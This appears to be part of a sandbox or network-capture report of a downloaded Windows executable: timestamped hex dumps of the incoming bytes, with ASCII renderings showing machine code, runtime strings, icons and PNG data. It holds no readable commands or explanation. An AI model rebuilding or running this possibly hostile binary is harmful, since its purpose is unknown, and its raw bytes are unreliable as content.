                                                                  2022-04-20 07:18:55 UTC113INData Raw: ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 51 a3 ff ff 83 c4 14 83 c8 ff e9 06 02 00 00 66 39 30 74 db 53 8b 5d 10 3b de 74 0b 8b 03 3b c6 74 05 66 39 30 75 20 e8 6d b6 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 19 a3 ff ff 83 c4 14 83 c8 ff e9 cd 01 00 00 e8 4d b6 ff ff 8b 00 89 45 ec e8 43 b6 ff ff ff 75 14 89 30 53 ff 75 0c ff 75 08 e8 2c 02 00 00 83 c4 10 89 45 f4 83 f8 ff 0f 85 6f 01 00 00 e8 1e b6 ff ff 83 38 02 0f 85 61 01 00 00 6a 2f ff 75 0c e8 e0 77 00 00 59 59 85 c0 0f 85 4d 01 00 00 68 74 85 02 10 8d 45 fc 56 50 e8 30 05 00 00 83 c4 0c 3b c6 74 1b 83 f8 16 0f 85 2e 01 00 00 56 56 56 56 56 e8 6c a1 ff ff 83 c4 14 e9 1c 01 00 00 39 75 fc 0f 84 13 01 00 00 6a 02 bb 04 01 00 00 53 e8 96 10 00 00 8b f8 59 59 3b fe 0f 84 fa 00 00 00 68 03 01 00 00 57
                                                                  Data Ascii: VVVVVQf90tS];t;tf90u mVVVVVMECu0Suu,Eo8aj/uwYYMhtEVP0;t.VVVVVl9ujSYY;hW
                                                                  2022-04-20 07:18:55 UTC129INData Raw: 59 01 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 48 04 00 00 0f b6 70 02 0f b6 59 02 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 27 04 00 00 0f b6 70 03 0f b6 59 03 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 02 04 00 00 8b 70 04 3b 71 04 74 7e 0f b6 70 04 0f b6 59 04 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 d9 03 00 00 0f b6 70 05 0f b6 59 05 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 b8 03 00 00 0f b6 70 06 0f b6 59 06 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 97 03 00 00 0f b6 70 07 0f b6 59 07 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 72 03 00 00 8b 70 08 3b 71 08 74 7e 0f b6 70 08 0f b6
                                                                  Data Ascii: Y+t3\HpY+t3\'pY+t3\3p;qt~pY+t3\pY+t3\pY+t3\pY+t3\3rp;qt~p
                                                                  2022-04-20 07:18:55 UTC145INData Raw: 38 5d fc 74 07 8b 4d f8 83 61 70 fd 5e 5f 5b c9 c3 8b ff 55 8b ec 53 57 33 ff 39 3d 74 2b 03 10 75 7d 8b 5d 08 3b df 75 1f e8 79 36 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 25 23 ff ff 83 c4 14 b8 ff ff ff 7f eb 69 8b 55 0c 3b d7 74 da 81 7d 10 ff ff ff 7f 77 d1 0f b7 03 66 83 f8 41 72 09 66 83 f8 5a 77 03 83 c0 20 0f b7 c8 0f b7 02 66 83 f8 41 72 09 66 83 f8 5a 77 03 83 c0 20 43 43 42 42 ff 4d 10 0f b7 c0 74 0a 66 3b cf 74 05 66 3b c8 74 c3 0f b7 d0 0f b7 c1 2b c2 eb 12 57 ff 75 10 ff 75 0c ff 75 08 e8 20 fe ff ff 83 c4 10 5f 5b 5d c3 8b ff 55 8b ec 51 51 53 56 8b 35 dc 2b 03 10 33 db 89 5d fc 8b 06 57 3b c3 74 50 8b 3d 90 80 02 10 53 53 6a ff 50 53 53 ff d7 89 45 f8 3b c3 74 41 6a 02 50 e8 95 90 ff ff 59 59 89 45 fc 3b c3 74 30 ff 75 f8 50 6a ff ff 36
                                                                  Data Ascii: 8]tMap^_[USW39=t+u}];uy6WWWWW%#iU;t}wfArfZw fArfZw CCBBMtf;tf;t+Wuuu _[]UQQSV5+3]W;tP=SSjPSSE;tAjPYYE;t0uPj6
                                                                  2022-04-20 07:18:55 UTC161INData Raw: 02 10 8b ff 55 8b ec 51 53 8b 45 0c 83 c0 0c 89 45 fc 64 8b 1d 00 00 00 00 8b 03 64 a3 00 00 00 00 8b 45 08 8b 5d 0c 8b 6d fc 8b 63 fc ff e0 5b c9 c2 08 00 58 59 87 04 24 ff e0 8b ff 55 8b ec 51 51 53 56 57 64 8b 35 00 00 00 00 89 75 fc c7 45 f8 66 1c 02 10 6a 00 ff 75 0c ff 75 f8 ff 75 08 e8 96 ff ff ff 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d fc 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 96 0f 00 00 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 7b dc fe ff 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 59 0f 00 00 83 c4 20 5e 5d c3 8b ff 55 8b ec 83 ec
                                                                  Data Ascii: UQSEEddE]mc[XY$UQQSVWd5uEfjuuuE@MAd=];d_^[USVWE3PPPuuuuu E_^[E]UVuN3{jVvvjuvuY ^]U
                                                                  2022-04-20 07:18:55 UTC177INData Raw: 83 ce 08 a9 00 04 00 00 74 03 83 ce 04 a9 00 08 00 00 74 03 83 ce 02 a9 00 10 00 00 74 03 83 ce 01 a9 00 01 00 00 74 06 81 ce 00 00 08 00 8b c8 bb 00 60 00 00 23 cb 74 2a 81 f9 00 20 00 00 74 1c 81 f9 00 40 00 00 74 0c 3b cb 75 16 81 ce 00 03 00 00 eb 0e 81 ce 00 02 00 00 eb 06 81 ce 00 01 00 00 bf 40 80 00 00 23 c7 83 e8 40 74 1c 2d c0 7f 00 00 74 0d 83 e8 40 75 16 81 ce 00 00 00 01 eb 0e 81 ce 00 00 00 03 eb 06 81 ce 00 00 00 02 8b 45 ec 8b d0 23 45 08 f7 d2 23 d6 0b d0 3b d6 75 07 8b c6 e9 b0 00 00 00 e8 16 fd ff ff 50 89 45 f4 e8 8a 02 00 00 59 0f ae 5d f4 8b 4d f4 33 d2 84 c9 79 03 6a 10 5a f7 c1 00 02 00 00 74 03 83 ca 08 f7 c1 00 04 00 00 74 03 83 ca 04 f7 c1 00 08 00 00 74 03 83 ca 02 f7 c1 00 10 00 00 74 03 83 ca 01 be 00 01 00 00 85 ce 74 06 81
                                                                  Data Ascii: tttt`#t* t@t;u@#@t-t@uE#E#;uPEY]M3yjZttttt
                                                                  2022-04-20 07:18:55 UTC193INData Raw: 50 9d 02 10 47 42 52 00 64 9c 02 10 47 42 52 00 54 9c 02 10 55 53 41 00 4c 9d 02 10 55 53 41 00 0c 0c 1a 0c 07 10 36 04 0c 08 2d 04 03 04 0c 10 10 08 1d 08 30 00 00 00 4f 43 50 00 41 43 50 00 4e 6f 72 77 65 67 69 61 6e 2d 4e 79 6e 6f 72 73 6b 00 00 00 00 00 00 00 06 80 80 86 80 81 80 00 00 10 03 86 80 86 82 80 14 05 05 45 45 45 85 85 85 05 00 00 30 30 80 50 80 88 00 08 00 28 27 38 50 57 80 00 07 00 37 30 30 50 50 88 00 00 00 20 28 80 88 80 80 00 00 00 60 68 60 68 68 68 08 08 07 78 70 70 77 70 70 08 08 00 00 08 00 08 00 07 08 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 00 00 00 00 47 65 74 50 72 6f 63 65 73 73 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 00 47 65 74 55 73 65 72 4f 62 6a 65 63 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 41 00 00
                                                                  Data Ascii: PGBRdGBRTUSALUSA6-0OCPACPNorwegian-NynorskEEE00P('8PW700PP (`h`hhhxppwppSystemRootGetProcessWindowStationGetUserObjectInformationA
                                                                  2022-04-20 07:18:55 UTC209INData Raw: 00 00 00 00 01 00 00 00 0c e4 02 10 14 e4 02 10 00 00 00 00 58 22 03 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 fc e3 02 10 74 22 03 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c4 e3 02 10 00 00 00 00 d0 23 01 00 e4 80 01 00 68 ed 01 00 c5 1c 02 00 cf 1d 02 00 c8 5f 02 00 ee 5f 02 00 1c 60 02 00 49 60 02 00 6c 60 02 00 87 60 02 00 b0 60 02 00 d8 60 02 00 34 61 02 00 84 61 02 00 a0 61 02 00 cb 61 02 00 f8 61 02 00 28 62 02 00 58 62 02 00 c1 62 02 00 04 63 02 00 40 63 02 00 88 63 02 00 d0 63 02 00 18 64 02 00 4b 64 02 00 89 64 02 00 b8 64 02 00 e8 64 02 00 18 65 02 00 48 65 02 00 8b 65 02 00 c9 65 02 00 09 66 02 00 52 66 02 00 a1 66 02 00 e2 66 02 00 29 67 02 00 88 67 02 00 c8 67 02 00 f8 67 02 00 30 68 02 00 58 68 02
                                                                  Data Ascii: X"@t"@#h__`I`l````4aaaaa(bXbbc@cccdKddddeHeeefRfff)gggg0hXh
                                                                  2022-04-20 07:18:55 UTC225INData Raw: 00 00 00 00 00 00 00 00 50 c3 0f 40 00 00 00 00 00 00 00 00 24 f4 12 40 00 00 00 00 00 00 00 80 96 98 16 40 00 00 00 00 00 00 00 20 bc be 19 40 00 00 00 00 00 04 bf c9 1b 8e 34 40 00 00 00 a1 ed cc ce 1b c2 d3 4e 40 20 f0 9e b5 70 2b a8 ad c5 9d 69 40 d0 5d fd 25 e5 1a 8e 4f 19 eb 83 40 71 96 d7 95 43 0e 05 8d 29 af 9e 40 f9 bf a0 44 ed 81 12 8f 81 82 b9 40 bf 3c d5 a6 cf ff 49 1f 78 c2 d3 40 6f c6 e0 8c e9 80 c9 47 ba 93 a8 41 bc 85 6b 55 27 39 8d f7 70 e0 7c 42 bc dd 8e de f9 9d fb eb 7e aa 51 43 a1 e6 76 e3 cc f2 29 2f 84 81 26 44 28 10 17 aa f8 ae 10 e3 c5 c4 fa 44 eb a7 d4 f3 f7 eb e1 4a 7a 95 cf 45 65 cc c7 91 0e a6 ae a0 19 e3 a3 46 0d 65 17 0c 75 81 86 75 76 c9 48 4d 58 42 e4 a7 93 39 3b 35 b8 b2 ed 53 4d a7 e5 5d 3d c5 5d 3b 8b 9e 92 5a ff 5d a6
                                                                  Data Ascii: P@$@@ @4@N@ p+i@]%O@qC)@D@<Ix@oGAkU'9p|B~QCv)/&D(DJzEeFeuuvHMXB9;5SM]=];Z]
                                                                  2022-04-20 07:18:55 UTC241INData Raw: 00 00 01 00 0d 00 30 30 10 00 01 00 04 00 68 06 00 00 d6 00 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 3e 07 00 00 18 18 10 00 01 00 04 00 e8 01 00 00 26 0a 00 00 10 10 10 00 01 00 04 00 28 01 00 00 0e 0c 00 00 30 30 00 00 01 00 08 00 a8 0e 00 00 36 0d 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 de 1b 00 00 18 18 00 00 01 00 08 00 c8 06 00 00 86 24 00 00 10 10 00 00 01 00 08 00 68 05 00 00 4e 2b 00 00 00 00 00 00 01 00 20 00 d2 d9 00 00 b6 30 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 88 0a 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 30 30 01 00 18 18 00 00 01 00 20 00 88 09 00 00 d8 40 01 00 10 10 00 00 01 00 20 00 68 04 00 00 60 4a 01 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 04 00 00 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: 00h >&(006 $hN+ 000 % 00 @ h`J(0`
                                                                  2022-04-20 07:18:55 UTC257INData Raw: 0a 03 09 51 15 00 00 ff 04 2c 35 42 40 2e 0a 0a 0a 03 09 0a 15 00 00 03 03 03 03 03 03 03 03 03 03 03 09 0a 15 00 00 00 04 06 06 06 06 06 06 09 09 09 09 0a 15 00 00 00 04 51 39 39 39 39 39 39 39 39 39 51 15 00 00 00 15 15 15 15 15 15 15 15 15 15 15 15 12 00 00 04 00 2a 13 13 13 13 13 13 13 13 13 3a 00 04 00 00 00 47 47 47 47 47 47 47 47 47 47 47 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 c0 01 00 00 c0 01 00 00 c0 01 00 00 a0 02 00 00 e0 03 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 20 00 49 44 41 54 78 9c ec bd 79 ac 2c d9 7d df f7 39 e7 d4 d2 eb dd de 36 6f de bc 19 ce 0c 87 9b 44 91 22 47 a2
                                                                  Data Ascii: Q,5B@.Q999999999Q*:GGGGGGGGGGGPNGIHDR\rf IDATxy,}96oD"G
                                                                  2022-04-20 07:18:55 UTC273INData Raw: 24 5e e6 0a 37 c2 e2 59 30 46 0d 05 58 6d 9a e8 c4 2d 1b 4d 93 94 34 d5 18 0b 7b c7 2d 52 ed 12 4e 28 4f 21 90 08 2b 90 08 3c 2f 20 f4 7d 82 d0 c3 0f 14 be a7 86 29 a6 83 c0 73 06 d0 7a c5 2d 3d f5 9c 57 c2 1a 43 9c 24 a4 71 44 92 c4 1c b7 0f b1 46 43 d2 46 58 1f 21 2c 81 02 4f 42 e0 09 94 04 4f 81 12 16 25 41 65 be f9 22 08 49 38 db 43 ee b3 2f 83 dc 3d 45 ca 7a bd b0 36 f3 23 e4 28 96 80 1e 29 33 a2 06 d8 d1 77 38 ca 48 26 be b6 e2 9a d5 d4 ef ff 13 f4 c5 ff 1c 1d 3c 31 a5 f0 69 74 52 cd f8 76 a0 c7 22 12 70 de 19 ff b4 ce 6e 6d 6d c5 4a a9 21 03 00 46 c4 f9 dc f5 57 3e 9f eb fe d3 ac ba e3 6a 83 db b8 42 b2 75 e9 09 3c df 63 d0 eb 71 bc 7b c8 e6 a5 f3 54 2b 55 a2 38 21 d1 31 42 09 a4 ca 0c 5e 3e 66 2c 58 00 00 20 00 49 44 41 54 c6 a2 85 73 85 09 03 56
                                                                  Data Ascii: $^7Y0FXm-M4{-RN(O!+</ })sz-=WC$qDFCFX!,OBO%Ae"I8C/=Ez6#()3w8H&<1itRv"pnmmJ!FW>jBu<cq{T+U8!1B^>f,X IDATsV
                                                                  2022-04-20 07:18:55 UTC289INData Raw: 55 b0 00 9c 0f 85 58 4a 13 fc 77 13 b2 3b 5b e4 de 7e a5 5e d2 dc dd ac 40 9f f9 5b 66 ef 0a 8a dd 98 40 72 27 0e 59 66 ef 02 dd 45 08 dc 77 03 d1 7b c1 01 bc 4a 53 c2 97 4e 1a d1 da d5 75 1d b0 2a 7b 7e 79 db d0 c1 39 03 74 a3 f8 4a 1d 1d 1d 9d 3b 6b 1a 6b 1c eb f5 9a 2c cb 76 52 67 5d a6 e9 fa f9 69 59 a2 ee ef fb 6e 81 8b 02 48 f4 d6 0f bd f9 bd 8b 23 b2 9d 0f 7d 08 3a d7 e6 bd 67 bd 5e f3 ed 6f 7f 9b d5 6a c5 f3 e7 cf 19 8f c7 e4 59 86 2e 32 f2 a3 11 72 90 63 44 68 2d 96 67 90 8f 35 62 a0 29 ca 01 d2 87 1e 80 5a 6b ca b2 dc 39 bf ad 20 50 8a b2 1c 30 c8 0a 6a b1 0a 26 7e 27 f6 91 4e a8 bb 5d 97 c9 fb 50 dc 43 cb 76 ef c7 ee e3 4c 31 93 d4 99 c8 98 06 b3 5e 32 1c 54 64 3a c7 3a 87 b1 21 38 a7 62 5f c3 d4 35 28 59 65 ad 29 df c2 76 db 28 63 2b 2c fa cc
                                                                  Data Ascii: UXJw;[~^@[f@r'YfEw{JSNu*{~y9tJ;kk,vRg]iYnH#}:g^ojY.2rcDh-g5b)Zk9 P0j&~'N]PCvL1^2Td::!8b_5(Ye)v(c+,
                                                                  2022-04-20 07:18:55 UTC305INData Raw: 05 45 d3 e9 d2 b5 0b 4b 13 b2 6c c0 60 30 60 34 1a 32 1a 0d d9 db bb c4 78 bc c3 72 b5 e0 e8 f0 88 d3 e9 a9 af 87 6f 98 9e 9c b0 9c cf 89 a2 94 24 8d bd 65 91 91 a6 a9 4b 71 96 0e 29 c7 27 cf 28 19 e2 f7 6b 8d d8 18 8d c0 cd fa d3 ae 35 12 da 18 f2 bc e2 68 7a cc ed fb f7 b8 3f 3d a2 aa 0b 94 90 8c 64 c2 64 30 64 9c 66 a4 49 06 89 e4 be 5e 72 6f 7e cc d1 62 ee 42 9d 52 b5 80 a2 c1 e1 0b c1 05 b0 04 79 60 31 62 ad c9 37 ec 83 c0 fc 3e 04 10 f4 b6 41 b4 b8 a7 05 a4 12 ad af 6f b0 9c 34 c7 3c 1b 3d b7 3e d2 03 19 5f b4 ef c3 b5 70 8f cd b0 e1 a6 fb d0 59 e3 b9 18 40 18 16 ab 59 2c 56 94 65 41 5d 57 3e cb f2 7c 80 cf 45 2d 60 30 18 b3 b3 b3 cb 70 38 72 c0 b1 cf 8d 88 63 98 4c 76 e3 9d 9d 89 c5 e1 57 09 8e e9 97 38 01 10 80 bf a0 f5 b7 e5 f3 5f 98 1e d7 c5 7e
                                                                  Data Ascii: EKl`0`42xro$eKq)'(k5hz?=dd0dfI^ro~bBRy`1b7>Ao4<=>_pY@Y,VeA]W>|E-`0p8rcLvW8_~
                                                                  2022-04-20 07:18:55 UTC321INData Raw: ff 00 00 00 01 ff 00 00 ff 00 00 00 01 7f 00 00 d7 c6 00 00 03 3f 00 00 ff c6 00 00 03 ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 80 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 bf b7 0f b2 c2 c6 39 bc c8 cd 72 bc cc dc b0 c5 d0 d8 df 87 87 86 5e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 c5 be
                                                                  Data Ascii: ?( @ 9r^
                                                                  2022-04-20 07:18:56 UTC337INData Raw: c8 45 33 c9 33 c9 83 f8 7f 0f 87 1e 02 00 00 45 8b c6 41 8b d6 ff 15 d1 67 00 00 48 8b c8 48 89 05 5f 9c 00 00 ff 15 51 67 00 00 44 8d 47 04 48 8d 15 7a b2 00 00 48 8d 0d 5f 6c 00 00 e8 ca 20 00 00 85 c0 75 2d 21 7c 24 28 45 33 c9 45 33 c0 33 c9 ba b1 04 00 00 c7 44 24 20 10 00 00 00 e8 58 1e 00 00 c7 05 22 a9 00 00 14 07 07 80 e9 d3 01 00 00 8b 05 37 b2 00 00 a8 40 75 08 84 c0 0f 89 b8 00 00 00 41 b8 04 01 00 00 48 8d 54 24 30 48 8d 0d 15 6c 00 00 e8 70 20 00 00 33 c9 85 c0 75 0c 21 7c 24 28 45 33 c9 45 33 c0 eb a4 4c 8d 44 24 30 41 8b d6 ff 15 70 66 00 00 48 89 05 b9 9b 00 00 48 85 c0 74 75 ff 15 6e 65 00 00 3d b7 00 00 00 75 68 45 33 c9 4c 8d 05 e5 a8 00 00 33 c9 f6 05 c8 b1 00 00 80 74 18 21 7c 24 28 ba 4b 05 00 00 c7 44 24 20 10 00 00 00 e8 bc 1d 00
                                                                  Data Ascii: E33EAgHH_QgDGHzH_l u-!|$(E3E33D$ X"7@uAHT$0Hlp 3u!|$(E3E3LD$0ApfHHtune=uhE3L3t!|$(KD$
                                                                  2022-04-20 07:18:56 UTC353INData Raw: 98 29 00 00 49 03 dc 3c 41 74 47 3c 44 74 3a 3c 49 74 2d 3c 4e 74 20 3c 50 74 12 3c 53 74 05 41 8b f7 eb 3b 83 0d 7d 72 00 00 04 eb 2b 0f ba 2d 3f 64 00 00 07 eb 28 83 25 6a 72 00 00 fe eb 18 83 25 61 72 00 00 fd eb 0f 83 0d 24 64 00 00 40 eb 0d 09 3d 50 72 00 00 44 89 25 f5 60 00 00 8a 03 84 c0 75 95 e9 4a ff ff ff 83 4c 24 28 ff 48 8d 44 24 41 41 83 c9 ff 48 89 44 24 20 4c 8d 05 78 2d 00 00 41 8b d4 b9 7f 00 00 00 ff 15 a2 25 00 00 2b c7 0f 84 1a ff ff ff e9 12 ff ff ff 8a 44 24 42 84 c0 75 0c 66 89 3d b6 60 00 00 e9 01 ff ff ff 3c 3a 0f 85 f6 fe ff ff 48 0f be 4c 24 43 ff 15 d5 28 00 00 3c 31 74 dc 3c 41 74 09 3c 55 74 d4 e9 d9 fe ff ff 66 44 89 25 84 60 00 00 e9 cf fe ff ff 8a 44 24 42 84 c0 75 0c 44 89 25 64 60 00 00 e9 bb fe ff ff 3c 3a 0f 85 b0 fe
                                                                  Data Ascii: )I<AtG<Dt:<It-<Nt <Pt<StA;}r+-?d(%jr%ar$d@=PrD%`uJL$(HD$AAHD$ Lx-A%+D$Buf=`<:HL$C(<1t<At<UtfD%`D$BuD%d`<:
                                                                  2022-04-20 07:18:56 UTC369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 11 00 00 b7 11 00 00 90 9c 00 00 c0 11 00 00 b8 12 00 00 9c 9c 00 00 c0 12 00 00 89 14 00 00 b8 9c 00 00 90 14 00 00 53 15 00 00 dc 9c 00 00 5c 15 00 00 ef 15 00 00 f4 9c 00 00 f8 15 00 00 3c 1b 00 00 08 9d 00 00 44 1b 00 00 31 1c 00 00 2c 9d 00 00 38 1c 00 00 fa 1e 00 00 3c 9d 00 00 00 1f 00 00 ba 20 00 00 60 9d 00 00 c0 20 00 00 6c 21 00 00 80 9d 00 00 74 21 00 00 95 22 00 00 98 9d 00 00 9c 22 00 00 1e 23 00 00 a4 9d 00 00 24 23 00 00 40 24 00 00 bc 9d 00 00 48 24 00 00 21 26 00 00 d0 9d 00 00 28 26 00
                                                                  Data Ascii: DS\<D1,8< ` l!t!""#$#@$H$!&(&
                                                                  2022-04-20 07:18:56 UTC385INData Raw: 00 00 00 00 88 ff ff ff f8 8f ff 8f 8f f8 88 88 85 78 88 70 00 00 00 00 00 00 00 00 7f ff ff ff ff f8 88 88 77 78 78 77 88 7c 88 80 00 00 00 00 00 00 00 00 88 f8 88 87 77 67 77 77 78 78 88 88 88 88 88 88 00 00 00 00 00 00 00 00 78 77 87 67 67 77 87 88 88 88 88 88 88 88 78 87 00 00 00 00 00 00 00 00 78 88 77 78 88 88 f8 8f 8f 8f 8f 8f 8f 88 8c f8 80 00 00 00 00 00 00 00 88 88 87 88 ff ff ff f8 f8 f8 8f 88 88 88 88 78 70 00 00 00 00 00 00 00 78 88 78 88 f8 f8 f8 f8 f8 ff 88 f8 ff 8f 88 87 80 00 00 00 00 00 00 00 78 88 88 78 f8 ff 8f 8f f8 f8 f8 f8 88 88 88 80 00 00 00 00 00 00 00 00 88 88 78 88 ff 8f 8f f8 8f 88 88 88 88 88 88 70 00 00 00 00 00 00 00 00 87 88 80 08 88 88 88 88 88 88 88 87 87 87 87 00 00 00 00 00 00 00 00 00 00 00 00 08 88 88 88 88 78 88 88
                                                                  Data Ascii: xpwxxw|wgwwxxxwggwxxwxxpxxxxxpx
                                                                  2022-04-20 07:18:56 UTC401INData Raw: 9c 26 e7 2e 0f 83 41 64 ed 4b 21 10 ce d2 af 87 2a 80 21 97 06 0c 26 75 e7 53 53 2c 0a 72 2b d8 cc 09 a9 20 b7 01 14 52 85 ad 81 fd fe b1 a6 9f a5 f4 dc e6 fb d8 46 1f c7 24 dd 33 8f d8 9b f6 6f 9c 4e 9e 9b f4 c8 c7 db 9d 5c d7 a2 b4 2a 8b ff 34 fd fb fd c4 b8 a4 f4 e8 f7 db 27 72 20 9e 95 1e 16 8e 56 6a 04 7c 90 36 84 49 ab ad 7e f9 97 7f 73 af db ed c7 49 92 12 04 7e 11 fd 97 45 f7 e9 cc 72 6b 32 f7 9e 35 a3 91 82 a3 52 c0 88 17 20 3f f6 ad b1 7f 14 f8 97 45 4f c4 06 14 08 c8 ad cb 65 9a 2c 05 08 46 03 59 96 33 ce e5 65 4e 2b 9b 2f 1a 9a 4d 27 c3 7d e7 a1 f1 b6 e7 eb f7 22 f5 2f da a3 47 47 49 12 c5 f7 ef bf f7 fa a4 6b f3 ae 14 9c 94 2e ff 61 d9 e3 96 8e 04 5c a5 65 73 d9 28 43 21 78 67 30 88 7b 71 9c a2 86 09 30 0a 57 9f d6 64 2e 42 0b 23 de 81 5c 05
                                                                  Data Ascii: &.AdK!*!&uSS,r+ RF$3oN\*4'r Vj|6I~sI~Erk25R ?EOe,FY3eN+/M'}"/GGIk.a\es(C!xg0{q0Wd.B#\
                                                                  2022-04-20 07:18:56 UTC417INData Raw: cb 11 5e 9f 06 d3 dc 7d 41 e1 e7 48 7c a8 02 0c 7b db 36 3f 49 7f 27 7f 7e 6b ee a7 40 5d f2 e3 7d 58 6f bb be ef 4e 1d 0a 6d d6 8c 09 29 c0 5c 28 a4 d2 b1 38 2b 59 78 a1 1d 79 42 18 84 fe 0c c9 9d e8 df 91 8e 95 e4 ab bd fb 75 9b fb 70 57 37 20 f9 f5 5a 6b b2 7c c0 b0 28 28 ca 32 7c 8a 21 4a b5 45 69 09 9e 1e 40 62 a1 ca b4 8e 69 4e 6b 2d 83 c1 98 f1 b8 d8 ee f7 eb a0 b7 8d 1c bc 73 1a f0 2e 27 30 1c 0e 4d 96 65 0d e0 bb 37 a8 cb 1c 09 f4 d3 e2 02 42 33 cc d6 3f df df 6f 94 ca f9 e3 c7 8f eb a7 4f bf 12 79 5e 72 7e 71 8e 31 1b 3e f9 e4 1f 78 fa ec 2b 74 96 6f a5 37 b4 8c d6 3d 76 62 e8 2e f3 76 2d 8f fe f6 e9 dc fb d7 72 1b 6d 21 bf 07 84 41 f7 f7 ee be fb fd 13 bb d6 09 10 05 80 47 23 d1 42 d2 58 43 e3 42 bf 01 4c 28 62 2a 87 13 f2 ec 84 c6 3a 5c 63 19
                                                                  Data Ascii: ^}AH|{6?I'~k@]}XoNm)\(8+YxyBupW7 Zk|((2|!JEi@biNk-s.'0Me7B3?oOy^r~q1>x+to7=vb.v-rm!AG#BXCBL(b*:\c
                                                                  2022-04-20 07:18:56 UTC433INData Raw: c6 8a 2c 75 ae c1 aa 8a 59 c5 35 45 d5 50 d6 0d 95 cf bb 68 b4 03 41 c3 ef 61 ad 8b c8 48 e1 aa 2f f1 dd 93 94 92 48 a1 5d ca 72 a3 c1 1a e2 38 02 65 a9 6c 89 ad 0d 30 70 89 49 c6 f8 c4 a0 f0 1b 75 31 81 f3 dc 80 b3 02 20 bc 3e b3 8f 65 a3 4c fa 69 50 07 f2 78 a0 05 10 e8 1b df f8 86 00 27 0c fc fb 5f 88 2c 86 27 2e 00 4e 4e 4e 58 2c 16 5a 29 65 42 0f fc 60 5a b6 20 60 00 a2 c2 55 14 d6 25 b3 00 d6 5a ab b5 2e 8c 31 ec ed ed fd 89 37 df 7c f3 c3 ef 7c e7 3b 95 90 62 7c 7c 7c f4 d3 83 83 83 eb 42 46 51 53 e6 58 bb 39 2e bc 1f 01 e8 32 7b 77 5b d8 be 16 4a 6b c0 ab 35 ff 7d e5 5f 92 24 4c 26 13 46 a3 11 79 9e b3 58 2c 30 c6 0d f3 3c 3e 3e a2 ae 4a c6 7b 7b ae 9d b7 8c 5d f9 ae 14 a0 24 c2 0f b1 70 4c e0 46 81 c7 42 92 8c 52 46 d9 80 38 49 68 ea 86 b2 2c b0
                                                                  Data Ascii: ,uY5EPhAaH/H]r8el0pIu1 >eLiPx'_,'.NNNX,Z)eB`Z `U%Z.17||;b|||BFQSX9.2{w[Jk5}_$L&FyX,0<>>J{{]$pLFBRF8Ih,
